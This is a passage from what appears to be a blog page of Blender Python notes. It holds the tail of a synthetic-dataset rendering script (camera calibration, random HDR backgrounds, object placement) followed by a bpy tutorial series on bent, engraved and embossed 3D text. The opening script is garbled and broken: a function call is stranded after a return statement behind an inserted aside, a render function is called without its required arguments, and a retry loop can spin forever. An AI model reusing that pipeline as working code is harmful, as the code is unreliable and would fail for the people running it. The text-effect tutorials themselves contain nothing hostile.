        # Commented-out code: the idea was to dump the loaded object names into a
        # YAML file, but this was never implemented.
        #with open(cocoYaml,'w',encoding='utf-8') as fc:
        #yaml.dump(objNameList,fc)

    loadCamera()

def loadCamera():
    camera_data = bpy.data.cameras.new(name='Camera')  # create a new camera datablock
    camera_data.lens = cameraLens  # set the focal length
    camera_object = bpy.data.objects.new('Camera', camera_data)  # wrap it in an object
    camera_object.rotation_euler[0] = math.pi / 2  # point the camera's Z axis at the scene objects (instead of upwards)
    bpy.context.scene.collection.objects.link(camera_object)  # add the camera to the scene
    for obj in bpy.data.objects:  # iterate over all objects in the scene
        # Parent every non-camera object to the camera, so everything follows when the camera moves
        if obj.name != 'Camera':
            obj.parent = bpy.data.objects['Camera']

    calibCamera()

def calibCamera():
    # Get the Camera object from the scene, plus its camera datablock
    cam = bpy.data.objects['Camera']
    camd = cam.data
    # Focal length in millimetres
    f_in_mm = camd.lens
    # Scene parameters: resolution_x_in_px / resolution_y_in_px are the image width and
    # height in pixels, and scale is the resolution percentage
    scene = bpy.context.scene
    resolution_x_in_px = scene.render.resolution_x
    resolution_y_in_px = scene.render.resolution_y
    scale = scene.render.resolution_percentage / 100
    # Sensor width and height in millimetres, and the pixel aspect ratio
    sensor_width_in_mm = camd.sensor_width
    sensor_height_in_mm = camd.sensor_height
    pixel_aspect_ratio = scene.render.pixel_aspect_x / scene.render.pixel_aspect_y
    # If the sensor fit is vertical, the sensor height is fixed and the effective width
    # varies with the pixel aspect ratio; otherwise the width is fixed and the height varies
    if (camd.sensor_fit == 'VERTICAL'):
        # the sensor height is fixed (sensor fit is vertical),
        # the sensor width is effectively changed with the pixel aspect ratio
        # Compute the two scale factors s_u and s_v from the sensor size and aspect ratio
        s_u = resolution_x_in_px * scale / sensor_width_in_mm / pixel_aspect_ratio
        s_v = resolution_y_in_px * scale / sensor_height_in_mm
    else:  # 'HORIZONTAL' and 'AUTO'
        # the sensor width is fixed (sensor fit is horizontal),
        # the sensor height is effectively changed with the pixel aspect ratio
        pixel_aspect_ratio = scene.render.pixel_aspect_x / scene.render.pixel_aspect_y
        s_u = resolution_x_in_px * scale / sensor_width_in_mm
        s_v = resolution_y_in_px * scale * pixel_aspect_ratio / sensor_height_in_mm

    # Parameters of intrinsic calibration matrix K
    # (alpha_u, alpha_v: focal lengths in pixels; u_0, v_0: principal point)
    alpha_u = f_in_mm * s_u
    alpha_v = f_in_mm * s_v
    u_0 = resolution_x_in_px * scale / 2
    v_0 = resolution_y_in_px * scale / 2
    skew = 0  # only use rectangular pixels
    # K = Matrix(
    #     ((alpha_u, skew,    u_0),
    #      (0,       alpha_v, v_0),
    #      (0,       0,       1)))
    # Assemble the K entries into a KITTI-style calibration list (only the P2 row
    # actually carries the intrinsics), using f-strings to build the lines.
    calList = [[f'P0: 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0\n'],
               [f'P1: 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0\n'],
               [f'P2: {alpha_u} {skew} {u_0} 0.0 0.0 {alpha_v} {v_0} 0.0 0.0 0.0 1.0 0.0\n'],
               [f'P3: 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0\n'],
               [f'R0_rect: 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0\n'],
               [f'Tr_velo_to_cam: 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0\n'],
               [f'Tr_imu_to_velo: 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0\n']]
    return calList
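As a sanity check on the numbers: with cameraLens = 15 and img_w = 960, and assuming Blender's default 36 mm sensor width and a resolution percentage of 100 (both assumptions, not read from the script), the intrinsics come out as:

# Back-of-the-envelope intrinsics for the config above (assumed 36 mm sensor)
f_in_mm, sensor_width_in_mm = 15, 36
img_w, img_h = 960, 540
alpha_u = f_in_mm * img_w / sensor_width_in_mm   # 400.0 px
u_0, v_0 = img_w / 2, img_h / 2                  # (480.0, 270.0)
print(alpha_u, u_0, v_0)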

    changeTheWorld()

def changeTheWorld():
    while True:
        # Pick random images until an .hdr map is found
        wd = random.choice(bpy.data.images)
        if wd.name.endswith('hdr'):
            break
    # Set it as the environment texture
    bpy.context.scene.world.node_tree.nodes['Environment Texture'].image = wd

    changeObjs()

def changeObjs():
    # Unlink everything except the camera from the active collection
    for obj in bpy.context.collection.objects:
        if obj.name != 'Camera':
            bpy.context.collection.objects.unlink(obj)
    nameList = []
    # Randomly pick objects until objsNum of them (a global variable) have been
    # linked back into the active collection
    while len(nameList) < objsNum:
        obj = random.choice(bpy.data.objects)
        if not (obj.name in nameList) and obj.name != 'Camera':
            bpy.context.collection.objects.link(obj)
            nameList.append(obj.name)

    bougeLe()

def bougeLe():
    # For every object except the camera: select it, then place it using a scale
    # factor derived from its dimensions and the camera's focal length
    for obj in bpy.data.objects:
        if obj.name != 'Camera':
            obj.select_set(True)
            # The scale computation can occasionally fail, so retry in a loop
            # (try/except) until it succeeds
            while True:
                try:
                    scale = math.sqrt(max(obj.dimensions)) * bpy.data.objects['Camera'].data.lens
                    obj.location = (0, 0, -0.08 * scale)
                    break
                except Exception:
                    continue
            # Randomize the object's location, rotation and scale; the parameters
            # control the magnitude and randomness of the transform
            bpy.ops.object.randomize_transform(random_seed=random.randint(0, 100), loc=(0.24, 0.1, 0.05), rot=(3, 3, 3), scale=(1, 1, 1))
        else:
            # For the camera, set a random Z rotation to simulate a scanning motion
            obj.rotation_euler[2] = 4 * random.uniform(-0.7, 0.7)

    snapIt()

def snapIt(scene, idNum):
    for obj in bpy.data.objects:
        if obj.name != 'Camera':
            # Deselect everything but the camera
            obj.select_set(False)
    # Build the output file path from imgPath and idNum
    imId = f'{imgPath}{idNum}.png'
    scene.render.filepath = imId
    # Render the scene and save the result as a PNG image
    bpy.ops.render.render(write_still=True)
Blender-Text Effects In Blender (1-6)

Resources

Course

Installing bpy on Linux

Download a prebuilt wheel from Releases · TylerGubala/blenderpy (github.com), then:

pip install bpy-2.91a0-cp37-cp37m-manylinux2014_x86_64.whl && bpy_post_install

    Create Curved Text In Blender | Bend Any Text | Part 1 in Text Effects | Two Easy Methods Explained

Creating a text object

1. Create a Text object:

    png

import bpy

bpy.ops.object.text_add()
text_obj = bpy.context.object
2. Set the Text object's Rotation X and Rotation Z to 90°:

    png

import numpy as np

text_obj.rotation_euler[0] = np.pi / 2
text_obj.rotation_euler[2] = np.pi / 2
3. Center-align the text:

    png

text_obj.data.align_x = "CENTER"
text_obj.data.align_y = "CENTER"
4. Set the Text's Geometry → Extrude to 0.1 m to give it thickness.

    png

text_obj.data.extrude = 0.1
5. Switch to Edit Mode to change the text content.

    png

text_obj.data.body = "Hello,\nWorld!"

Bending directly

    1. Text 对象添加一个 Simple DeformModifier

    png

text_modifier = text_obj.modifiers.new(name="Bend", type="SIMPLE_DEFORM")
2. Set its properties:

text_modifier.deform_method = "BEND"
text_modifier.deform_axis = "Z"
text_modifier.angle = np.pi / 4

This yields the bent text.


Complete code:

import bpy
import numpy as np

bpy.ops.object.text_add()
text_obj = bpy.context.object

text_obj.rotation_euler[0] = np.pi / 2
text_obj.rotation_euler[2] = np.pi / 2

text_obj.data.align_x = "CENTER"
text_obj.data.align_y = "CENTER"

text_obj.data.extrude = 0.1

text_obj.data.body = "Hello,\nWorld!"

text_modifier = text_obj.modifiers.new(name="Bend", type="SIMPLE_DEFORM")

text_modifier.deform_method = "BEND"
text_modifier.deform_axis = "Z"
text_modifier.angle = np.pi / 4
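Since the bend is just a modifier property, it can be keyframed; a minimal sketch, assuming the setup above (frame numbers are arbitrary):

# Animate the bend angle from flat to 45° over 48 frames
text_modifier.angle = 0.0
text_modifier.keyframe_insert(data_path="angle", frame=1)
text_modifier.angle = np.pi / 4
text_modifier.keyframe_insert(data_path="angle", frame=48)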

Bending along a Bezier curve

1. Create a Bezier Circle object and set its Rotation Z to 90°:

bpy.ops.curve.primitive_bezier_circle_add()
curve_obj = bpy.context.object

curve_obj.rotation_euler[2] = np.pi / 2
2. Add a Curve modifier to the Text object and point it at the BezierCircle created above:

curve_modifier = text_obj.modifiers.new(name="Curve", type="CURVE")
curve_modifier.object = curve_obj

The Text object now deforms along the BezierCircle curve.

3. Select the BezierCircle object, switch to Edit Mode, and choose Segments → Switch Direction to flip the text direction:

bpy.ops.object.editmode_toggle()
bpy.ops.curve.switch_direction()
bpy.ops.object.editmode_toggle()
4. Changing the BezierCircle's Scale reshapes the Text accordingly:

curve_obj.delta_scale[0:3] = [2, 2, 2]

Complete code:

import bpy
import numpy as np

# Create a Text object
bpy.ops.object.text_add()
text_obj = bpy.context.object

# Set the text rotation
text_obj.rotation_euler[0] = np.pi / 2
text_obj.rotation_euler[2] = np.pi / 2

# Center-align the text
text_obj.data.align_x = "CENTER"
text_obj.data.align_y = "CENTER"

# Extrude the text
text_obj.data.extrude = 0.1

# Set the text content
text_obj.data.body = "Hello,\nWorld!"

# Create a Bezier circle
bpy.ops.curve.primitive_bezier_circle_add()
curve_obj = bpy.context.object

# Rotate the circle
curve_obj.rotation_euler[2] = np.pi / 2

# Deform the text along the circle
curve_modifier = text_obj.modifiers.new(name="Curve", type="CURVE")
curve_modifier.object = curve_obj

# Flip the direction
bpy.ops.object.editmode_toggle()
bpy.ops.curve.switch_direction()
bpy.ops.object.editmode_toggle()

# Resize the circle
curve_obj.delta_scale[0:3] = [2, 2, 2]
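The Curve modifier maps the text's position along the deform axis (X by default) to arc length along the curve, so translating the text slides it around the circle. A hedged animation sketch, assuming the setup above:

# Slide the text roughly one lap around the scaled circle
text_obj.location[0] = 0.0
text_obj.keyframe_insert(data_path="location", index=0, frame=1)
text_obj.location[0] = 4 * np.pi  # circumference of the radius-1 circle scaled by 2
text_obj.keyframe_insert(data_path="location", index=0, frame=120)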

    Add Text To Any Curved Surface In Blender | Part 2 in Text Effects | Blender Eevee & Cycles

1. Create a teapot (see the note after this step; primitive_teapot_add comes from an add-on):

import bpy
import numpy as np

bpy.ops.mesh.primitive_teapot_add()
teapot_obj = bpy.context.object
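Note that primitive_teapot_add is not part of stock Blender; it is registered by the bundled "Add Mesh: Extra Objects" add-on. A sketch for enabling it from script, assuming the bundled module name add_mesh_extra_objects:

import addon_utils
# Enable the bundled add-on that registers bpy.ops.mesh.primitive_teapot_add
addon_utils.enable("add_mesh_extra_objects", default_set=True)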
2. Create a text object and set its alignment, position (near the teapot's surface), rotation, extrude, content, and line spacing:

bpy.ops.object.text_add()
text_obj = bpy.context.object

text_obj.data.align_x = "CENTER"
text_obj.data.align_y = "CENTER"

text_obj.location[1] = -2
text_obj.location[2] = 1.5

text_obj.rotation_euler[0] = np.pi / 2

text_obj.data.extrude = 0.1

text_obj.data.body = "Hello,\nWorld!"

text_obj.data.space_line = 0.75
3. Add a red material to the text object; switching to the rendered view now shows the text in red:

text_material = bpy.data.materials.new(name="TextMaterial")
text_material.use_nodes = True
nodes = text_material.node_tree.nodes
principled_bsdf = nodes.get("Principled BSDF")
if principled_bsdf is not None:
    principled_bsdf.inputs[0].default_value = (1, 0, 0, 1)

text_obj.data.materials.append(text_material)
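On an unmodified Principled BSDF node, inputs[0] is the Base Color socket; addressing it by name is equivalent and easier to read:

# Same assignment via the named socket
principled_bsdf.inputs["Base Color"].default_value = (1, 0, 0, 1)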
4. Create an Empty (Cube), place it at the same location as the Text, and set its rotation; it will drive the Text's bend:

bpy.ops.object.empty_add(type="CUBE")
empty_obj = bpy.context.object

empty_obj.location[1] = -2
empty_obj.location[2] = 1.5

empty_obj.rotation_euler[0] = np.pi / 2
empty_obj.rotation_euler[2] = np.pi / 2
5. Add the following modifiers to the Text object:

• Remesh: rebuild the text with uniform topology (Sharp mode) so it deforms cleanly:

text_modifier_remesh = text_obj.modifiers.new(name="Remesh", type="REMESH")
text_modifier_remesh.mode = "SHARP"
text_modifier_remesh.octree_depth = 8
text_modifier_remesh.use_remove_disconnected = False
• SimpleDeform: bends the text; choose Bend, set Origin to the Empty object, and Axis to Y:

text_modifier_simple_deform = text_obj.modifiers.new(name="SimpleDeform", type="SIMPLE_DEFORM")
text_modifier_simple_deform.deform_method = "BEND"
text_modifier_simple_deform.origin = empty_obj
text_modifier_simple_deform.deform_axis = "Y"
• Shrinkwrap: projects the text onto the teapot; set Wrap Method to Target Normal Project, Target to the Teapot object, and Offset to 0.1 m:

text_modifier_shrink_wrap = text_obj.modifiers.new(name="Shrinkwrap", type="SHRINKWRAP")
text_modifier_shrink_wrap.wrap_method = "TARGET_PROJECT"
text_modifier_shrink_wrap.target = teapot_obj
text_modifier_shrink_wrap.offset = 0.1

Complete code:

import bpy
import numpy as np

# Create the teapot object
bpy.ops.mesh.primitive_teapot_add()
teapot_obj = bpy.context.object

# Create the text object
bpy.ops.object.text_add()
text_obj = bpy.context.object

# Center-align
text_obj.data.align_x = "CENTER"
text_obj.data.align_y = "CENTER"

# Set the position
text_obj.location[1] = -2
text_obj.location[2] = 1.5

# Set the rotation
text_obj.rotation_euler[0] = np.pi / 2

# Set the extrude depth
text_obj.data.extrude = 0.1

# Set the text content
text_obj.data.body = "Hello,\nWorld!"

# Set the line spacing
text_obj.data.space_line = 0.75

# Create the material
text_material = bpy.data.materials.new(name="TextMaterial")
text_material.use_nodes = True
nodes = text_material.node_tree.nodes
principled_bsdf = nodes.get("Principled BSDF")
if principled_bsdf is not None:
    principled_bsdf.inputs[0].default_value = (1, 0, 0, 1)

# Assign the material to the text
text_obj.data.materials.append(text_material)

# Create the empty object
bpy.ops.object.empty_add(type="CUBE")
empty_obj = bpy.context.object

# Set the empty's position
empty_obj.location[1] = -2
empty_obj.location[2] = 1.5

# Set the empty's rotation
empty_obj.rotation_euler[0] = np.pi / 2
empty_obj.rotation_euler[2] = np.pi / 2

# Add the Remesh modifier
text_modifier_remesh = text_obj.modifiers.new(name="Remesh", type="REMESH")
text_modifier_remesh.mode = "SHARP"
text_modifier_remesh.octree_depth = 8
text_modifier_remesh.use_remove_disconnected = False

# Add the SimpleDeform modifier
text_modifier_simple_deform = text_obj.modifiers.new(name="SimpleDeform", type="SIMPLE_DEFORM")
text_modifier_simple_deform.deform_method = "BEND"
text_modifier_simple_deform.origin = empty_obj
text_modifier_simple_deform.deform_axis = "Y"

# Add the Shrinkwrap modifier
text_modifier_shrink_wrap = text_obj.modifiers.new(name="Shrinkwrap", type="SHRINKWRAP")
text_modifier_shrink_wrap.wrap_method = "TARGET_PROJECT"
text_modifier_shrink_wrap.target = teapot_obj
text_modifier_shrink_wrap.offset = 0.1

    Engrave & Emboss Text Easily In Blender | Part 3 in Text Effects | Create 3D Text Logo In Blender

1. Create a Cube and adjust its Scale:

import bpy
import numpy as np

bpy.ops.mesh.primitive_cube_add()
cube_obj = bpy.context.object

cube_obj.scale[0] = 1.5
cube_obj.scale[1] = 2.5
2. Create a Text object and adjust its Transform:

bpy.ops.object.text_add()
text_obj = bpy.context.object

text_obj.location[2] = 1.15
text_obj.rotation_euler[2] = np.pi / 2

Center-align it:

text_obj.data.align_x = "CENTER"
text_obj.data.align_y = "CENTER"

Set the text content:

text_obj.data.body = "Hello,\nWorld!"
3. After finalizing the text, convert it to a Mesh; from then on the content can no longer be edited!

bpy.ops.object.convert(target="MESH")
4. Apply a Decimate modifier to reduce the excess vertices:

text_modifier_decimate = text_obj.modifiers.new(name="Decimate", type="DECIMATE")
text_modifier_decimate.decimate_type = "DISSOLVE"
bpy.ops.object.modifier_apply(modifier="Decimate")
5. In Edit Mode, select all vertices of the Text object, then Mesh → Merge → By Distance; set 0.01 m in the dialog:

bpy.ops.object.editmode_toggle()
bpy.ops.mesh.select_all(action="SELECT")
bpy.ops.mesh.remove_doubles(threshold=0.01)
6. Mesh → Delete → Limited Dissolve; set Max Angle to 10° in the dialog:

bpy.ops.mesh.dissolve_limited(angle_limit=np.pi / 18)
bpy.ops.object.editmode_toggle()
7. Add a Solidify modifier to the Text to give it height:

text_modifier_solidify = text_obj.modifiers.new(name="Solidify", type="SOLIDIFY")
text_modifier_solidify.thickness = 0.2
8. In Object Mode, apply Shade Smooth to both the Text and the Cube:

bpy.ops.object.shade_smooth()

text_obj.data.use_auto_smooth = True

cube_obj.data.use_auto_smooth = True
9. Add a Boolean modifier to the Cube and hide the Text to get the engraved effect:

cube_modifier_boolean = cube_obj.modifiers.new(name="Boolean", type="BOOLEAN")
cube_modifier_boolean.object = text_obj
10. Add a Bevel modifier to the Cube for a beveled-edge effect:

cube_modifier_bevel = cube_obj.modifiers.new(name="Bevel", type="BEVEL")
cube_modifier_bevel.width = 0.005
cube_modifier_bevel.segments = 5
cube_modifier_bevel.use_clamp_overlap = False
cube_modifier_bevel.harden_normals = True
11. Switch the Boolean operation to Union for an embossed effect:

cube_modifier_boolean.operation = "UNION"

Hmm, if the result has holes, the only reliable fix seems to be manual cleanup, though switching the Boolean solver is worth a try first (see the sketch below).
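A cheap first attempt before manual cleanup (assumes Blender 2.91+, where the Boolean modifier gained an Exact solver):

# Slower than the default Fast solver but far more tolerant of messy geometry
cube_modifier_boolean.solver = 'EXACT'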


Complete code:

import bpy
import numpy as np

bpy.ops.mesh.primitive_cube_add()
cube_obj = bpy.context.object

cube_obj.scale[0] = 1.5
cube_obj.scale[1] = 2.5

bpy.ops.object.text_add()
text_obj = bpy.context.object

text_obj.location[2] = 1.15
text_obj.rotation_euler[2] = np.pi / 2

text_obj.data.align_x = "CENTER"
text_obj.data.align_y = "CENTER"

text_obj.data.body = "Hello,\nWorld!"

bpy.ops.object.convert(target="MESH")

text_modifier_decimate = text_obj.modifiers.new(name="Decimate", type="DECIMATE")
text_modifier_decimate.decimate_type = "DISSOLVE"
bpy.ops.object.modifier_apply(modifier="Decimate")

bpy.ops.object.editmode_toggle()
bpy.ops.mesh.select_all(action="SELECT")
bpy.ops.mesh.remove_doubles(threshold=0.01)

bpy.ops.mesh.dissolve_limited(angle_limit=np.pi / 18)
bpy.ops.object.editmode_toggle()

text_modifier_solidify = text_obj.modifiers.new(name="Solidify", type="SOLIDIFY")
text_modifier_solidify.thickness = 0.2

bpy.ops.object.shade_smooth()

text_obj.data.use_auto_smooth = True

cube_obj.data.use_auto_smooth = True

cube_modifier_boolean = cube_obj.modifiers.new(name="Boolean", type="BOOLEAN")
cube_modifier_boolean.object = text_obj

text_obj.hide_viewport = True
text_obj.hide_render = True

cube_modifier_bevel = cube_obj.modifiers.new(name="Bevel", type="BEVEL")
cube_modifier_bevel.width = 0.005
cube_modifier_bevel.segments = 5
cube_modifier_bevel.use_clamp_overlap = False
cube_modifier_bevel.harden_normals = True

cube_modifier_boolean.operation = "UNION"

    Engrave or Carve Text On Curved Surface | Part 4 in Text Effects | Blender Eevee & Cycles

1. Create a cylinder:

import bpy
import numpy as np

bpy.ops.mesh.primitive_cylinder_add()
cylinder_obj = bpy.context.object

Scale it up:

cylinder_obj.scale[0:3] = [1.2, 1.2, 1.2]

Add an Edge Split modifier and apply it:

cylinder_modifier_edgesplit = cylinder_obj.modifiers.new(name="EdgeSplit", type="EDGE_SPLIT")
bpy.ops.object.modifier_apply(modifier="EdgeSplit")

Add a Subdivision Surface modifier (2 levels) and apply it:

cylinder_modifier_subsurf = cylinder_obj.modifiers.new(name="Subdivision", type="SUBSURF")
cylinder_modifier_subsurf.levels = 2
bpy.ops.object.modifier_apply(modifier="Subdivision")
2. Create a text object:

bpy.ops.object.text_add()
text_obj = bpy.context.object

text_obj.location[0] = 1.22
text_obj.rotation_euler[0] = np.pi / 2
text_obj.rotation_euler[2] = np.pi / 2
text_obj.data.align_x = "CENTER"
text_obj.data.align_y = "CENTER"

Load an emoji-capable font, then set the content, size, and line spacing:

text_obj.data.font = bpy.data.fonts.load("C:\\windows\\Fonts\\seguiemj.ttf")
text_obj.data.body = "I❤\nYOU"

text_obj.data.size = 0.9
text_obj.data.space_line = 0.75

Convert the text to a mesh:

bpy.ops.object.convert(target="MESH")

Apply a Decimate modifier to reduce the vertex count:

text_modifier_decimate = text_obj.modifiers.new(name="Decimate", type="DECIMATE")
text_modifier_decimate.decimate_type = "DISSOLVE"
bpy.ops.object.modifier_apply(modifier="Decimate")

Add a Solidify modifier:

text_modifier_solidify = text_obj.modifiers.new(name="Solidify", type="SOLIDIFY")
text_modifier_solidify.thickness = 0.2

Shade smooth:

bpy.ops.object.shade_smooth()
text_obj.data.use_auto_smooth = True

Add an Empty at the text's location to drive the bend:

bpy.ops.object.empty_add(type="CUBE")
empty_obj = bpy.context.object

empty_obj.location[0:3] = text_obj.location[0:3]
empty_obj.rotation_euler[0] = np.pi / 2

Bend the text with a SimpleDeform modifier:

text_modifier_simple_deform = text_obj.modifiers.new(name="SimpleDeform", type="SIMPLE_DEFORM")
text_modifier_simple_deform.deform_method = "BEND"
text_modifier_simple_deform.origin = empty_obj
text_modifier_simple_deform.angle = -np.pi / 4
text_modifier_simple_deform.deform_axis = "Y"

Cut the text into the cylinder with a Boolean modifier and hide the text:

cylinder_modifier_boolean = cylinder_obj.modifiers.new(name="Boolean", type="BOOLEAN")
cylinder_modifier_boolean.object = text_obj

text_obj.hide_viewport = True
text_obj.hide_render = True

Give the cylinder a gold-ish material:

cylinder_material = bpy.data.materials.new(name="Material")
cylinder_material.use_nodes = True
nodes = cylinder_material.node_tree.nodes
principled_bsdf = nodes.get("Principled BSDF")
if principled_bsdf is not None:
    principled_bsdf.inputs[0].default_value = (1, 0.7, 0, 1)

cylinder_obj.data.materials.append(cylinder_material)

Complete code:

import bpy
import numpy as np

bpy.ops.mesh.primitive_cylinder_add()
cylinder_obj = bpy.context.object

cylinder_obj.scale[0:3] = [1.2, 1.2, 1.2]

cylinder_modifier_edgesplit = cylinder_obj.modifiers.new(name="EdgeSplit", type="EDGE_SPLIT")
bpy.ops.object.modifier_apply(modifier="EdgeSplit")

cylinder_modifier_subsurf = cylinder_obj.modifiers.new(name="Subdivision", type="SUBSURF")
cylinder_modifier_subsurf.levels = 2
bpy.ops.object.modifier_apply(modifier="Subdivision")

bpy.ops.object.text_add()
text_obj = bpy.context.object

text_obj.location[0] = 1.22
text_obj.rotation_euler[0] = np.pi / 2
text_obj.rotation_euler[2] = np.pi / 2
text_obj.data.align_x = "CENTER"
text_obj.data.align_y = "CENTER"

text_obj.data.font = bpy.data.fonts.load("C:\\windows\\Fonts\\seguiemj.ttf")
text_obj.data.body = "I❤\nYOU"

text_obj.data.size = 0.9
text_obj.data.space_line = 0.75

bpy.ops.object.convert(target="MESH")

text_modifier_decimate = text_obj.modifiers.new(name="Decimate", type="DECIMATE")
text_modifier_decimate.decimate_type = "DISSOLVE"
bpy.ops.object.modifier_apply(modifier="Decimate")

text_modifier_solidify = text_obj.modifiers.new(name="Solidify", type="SOLIDIFY")
text_modifier_solidify.thickness = 0.2

bpy.ops.object.shade_smooth()
text_obj.data.use_auto_smooth = True

bpy.ops.object.empty_add(type="CUBE")
empty_obj = bpy.context.object

empty_obj.location[0:3] = text_obj.location[0:3]
empty_obj.rotation_euler[0] = np.pi / 2

text_modifier_simple_deform = text_obj.modifiers.new(name="SimpleDeform", type="SIMPLE_DEFORM")
text_modifier_simple_deform.deform_method = "BEND"
text_modifier_simple_deform.origin = empty_obj
text_modifier_simple_deform.angle = -np.pi / 4
text_modifier_simple_deform.deform_axis = "Y"

cylinder_modifier_boolean = cylinder_obj.modifiers.new(name="Boolean", type="BOOLEAN")
cylinder_modifier_boolean.object = text_obj

text_obj.hide_viewport = True
text_obj.hide_render = True

cylinder_material = bpy.data.materials.new(name="Material")
cylinder_material.use_nodes = True
nodes = cylinder_material.node_tree.nodes
principled_bsdf = nodes.get("Principled BSDF")
if principled_bsdf is not None:
    principled_bsdf.inputs[0].default_value = (1, 0.7, 0, 1)

cylinder_obj.data.materials.append(cylinder_material)

    Emboss Any Text On Curved Surface | Bend Any Text | Part 5 in Text Effects | Blender Eevee & Cycles

1. Create a cylinder:

import bpy
import numpy as np

bpy.ops.mesh.primitive_cylinder_add()
cylinder_obj = bpy.context.object
2. Add an Edge Split modifier and apply it to split the edges:

cylinder_modifier_edgesplit = cylinder_obj.modifiers.new(name="EdgeSplit", type="EDGE_SPLIT")
bpy.ops.object.modifier_apply(modifier="EdgeSplit")
3. Add a Subdivision Surface modifier and apply it to smooth the object:

cylinder_modifier_subsurf = cylinder_obj.modifiers.new(name="Subdivision", type="SUBSURF")
cylinder_modifier_subsurf.levels = 2
bpy.ops.object.modifier_apply(modifier="Subdivision")
4. Create a Text object and adjust its parameters:

bpy.ops.object.text_add()
text_obj = bpy.context.object

text_obj.location[0] = 1.1
text_obj.rotation_euler[0] = np.pi / 2
text_obj.rotation_euler[2] = np.pi / 2

Set the text content:

text_obj.data.body = "Hello,\nWorld!"

Center-align it:

text_obj.data.align_x = "CENTER"
text_obj.data.align_y = "CENTER"

Set the text size:

text_obj.data.size = 0.5
5. Add a Solidify modifier extruding 0.15 m:

text_modifier_solidify = text_obj.modifiers.new(name="Solidify", type="SOLIDIFY")
text_modifier_solidify.thickness = 0.15
6. Convert the Text to a Mesh (this also applies the Solidify modifier):

bpy.ops.object.convert(target="MESH")
7. Process it with a Remesh modifier:

text_modifier_remesh = text_obj.modifiers.new(name="Remesh", type="REMESH")
text_modifier_remesh.mode = "SHARP"
text_modifier_remesh.octree_depth = 8
text_modifier_remesh.use_remove_disconnected = False
8. Process it with Decimate to reduce the edge count:

text_modifier_decimate = text_obj.modifiers.new(name="Decimate", type="DECIMATE")
text_modifier_decimate.decimate_type = "DISSOLVE"
bpy.ops.object.modifier_apply(modifier="Decimate")
9. Shade smooth:

bpy.ops.object.shade_smooth()

text_obj.data.use_auto_smooth = True

cylinder_obj.data.use_auto_smooth = True
10. Create an Empty at the same location as the Text, to drive the bend:

bpy.ops.object.empty_add(type="CUBE")
empty_obj = bpy.context.object

empty_obj.location[0:3] = text_obj.location[0:3]
empty_obj.rotation_euler[0] = np.pi / 2
11. Set up a SimpleDeform modifier to bend the Text:

text_modifier_simple_deform = text_obj.modifiers.new(name="SimpleDeform", type="SIMPLE_DEFORM")
text_modifier_simple_deform.deform_method = "BEND"
text_modifier_simple_deform.origin = empty_obj
text_modifier_simple_deform.angle = -np.pi / 2
text_modifier_simple_deform.deform_axis = "Y"
12. A simple way to get the emboss is Object → Join (sketched below); alternatively, use a Boolean Union:
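A sketch of the Join route (joining merely merges the meshes into one object, so it avoids Boolean artifacts but leaves the intersecting geometry in place):

# Join the text into the cylinder instead of a Boolean union
bpy.ops.object.select_all(action='DESELECT')
text_obj.select_set(True)
cylinder_obj.select_set(True)
bpy.context.view_layer.objects.active = cylinder_obj  # join target
bpy.ops.object.join()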

cylinder_modifier_boolean = cylinder_obj.modifiers.new(name="Boolean", type="BOOLEAN")
cylinder_modifier_boolean.operation = "UNION"
cylinder_modifier_boolean.object = text_obj
13. Add a Bevel modifier for a beveled-edge effect, then hide the Text:

cylinder_modifier_bevel = cylinder_obj.modifiers.new(name="Bevel", type="BEVEL")
cylinder_modifier_bevel.width = 0.005
cylinder_modifier_bevel.segments = 5
cylinder_modifier_bevel.use_clamp_overlap = False
cylinder_modifier_bevel.harden_normals = True

text_obj.hide_viewport = True
text_obj.hide_render = True
14. If the surface breaks, you'll have to patch the edges manually.


Complete code:

import bpy
import numpy as np

bpy.ops.mesh.primitive_cylinder_add()
cylinder_obj = bpy.context.object

cylinder_modifier_edgesplit = cylinder_obj.modifiers.new(name="EdgeSplit", type="EDGE_SPLIT")
bpy.ops.object.modifier_apply(modifier="EdgeSplit")

cylinder_modifier_subsurf = cylinder_obj.modifiers.new(name="Subdivision", type="SUBSURF")
cylinder_modifier_subsurf.levels = 2
bpy.ops.object.modifier_apply(modifier="Subdivision")

bpy.ops.object.text_add()
text_obj = bpy.context.object

text_obj.location[0] = 1.1
text_obj.rotation_euler[0] = np.pi / 2
text_obj.rotation_euler[2] = np.pi / 2
text_obj.data.align_x = "CENTER"
text_obj.data.align_y = "CENTER"

text_obj.data.body = "Hello,\nWorld!"

text_obj.data.size = 0.5

text_modifier_solidify = text_obj.modifiers.new(name="Solidify", type="SOLIDIFY")
text_modifier_solidify.thickness = 0.15

bpy.ops.object.convert(target="MESH")

text_modifier_remesh = text_obj.modifiers.new(name="Remesh", type="REMESH")
text_modifier_remesh.mode = "SHARP"
text_modifier_remesh.octree_depth = 8
text_modifier_remesh.use_remove_disconnected = False

text_modifier_decimate = text_obj.modifiers.new(name="Decimate", type="DECIMATE")
text_modifier_decimate.decimate_type = "DISSOLVE"
bpy.ops.object.modifier_apply(modifier="Decimate")

bpy.ops.object.shade_smooth()

text_obj.data.use_auto_smooth = True

cylinder_obj.data.use_auto_smooth = True

bpy.ops.object.empty_add(type="CUBE")
empty_obj = bpy.context.object

empty_obj.location[0:3] = text_obj.location[0:3]
empty_obj.rotation_euler[0] = np.pi / 2

text_modifier_simple_deform = text_obj.modifiers.new(name="SimpleDeform", type="SIMPLE_DEFORM")
text_modifier_simple_deform.deform_method = "BEND"
text_modifier_simple_deform.origin = empty_obj
text_modifier_simple_deform.angle = -np.pi / 2
text_modifier_simple_deform.deform_axis = "Y"

cylinder_modifier_boolean = cylinder_obj.modifiers.new(name="Boolean", type="BOOLEAN")
cylinder_modifier_boolean.operation = "UNION"
cylinder_modifier_boolean.object = text_obj

cylinder_modifier_bevel = cylinder_obj.modifiers.new(name="Bevel", type="BEVEL")
cylinder_modifier_bevel.width = 0.005
cylinder_modifier_bevel.segments = 5
cylinder_modifier_bevel.use_clamp_overlap = False
cylinder_modifier_bevel.harden_normals = True

text_obj.hide_viewport = True
text_obj.hide_render = True

    Neon Light or Neon Sign In Blender | Easy & Realistic Method For Blender Eevee (All Versions)
